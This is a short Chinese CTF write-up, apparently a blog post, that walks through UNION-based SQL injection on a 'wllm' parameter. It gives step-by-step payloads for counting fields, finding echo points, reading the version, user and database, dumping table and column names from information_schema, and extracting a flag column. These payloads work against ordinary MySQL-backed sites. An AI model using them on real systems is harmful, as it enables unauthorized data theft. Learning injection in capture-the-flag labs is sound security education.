文章讨论了SQL注入攻击的几种常见手法,如判断字段数、回显点检测、查询数据库信息、用户和表名获取,以及利用`unionselect`进行表名和列名爆破,最后提到检查特定flag字段。作者使用wllm参数演示了这些操作的过程。
1. 是否存在注入并且判断注入类型
2. 判断字段数 ' order by 数字 -- '
3. 确定回显点 -1 ' union select 1,2 -- '
4. 查询数据库信息 @@version @@datadir
5. 查询用户名,数据库名 user() database()
6. 查询表名 -1 ' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='数据库名' -- '
7. 查询列名 -1 ' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='表名' -- '
8. 查询flag -1 ' union select 1,2, group_concat(flag所在的列名) from 表名
用wllm参数试一下
/?wllm=1
判断字段数
/?wllm=-1 ' union order by 3 -- '3可以,4不行,说明字段数为3
查看回显点
/?wllm=-1 ' union select 1,2,3 -- '数据库信息
/?wllm=-1 ' union select 1, 2, @@version -- '查询库名和用户名
/?wllm=-1 ' union select 1, 2, database() -- '/?wllm=-1 ' union select 1, 2, user() -- '
6. 爆表
7. 爆列
先试试test_tb表
/?wllm=-1 ' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='test_tb' -- '
8. 查flag
/?wllm=-1 ' union select 1,2, group_concat(flag) from test_tb -- '
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
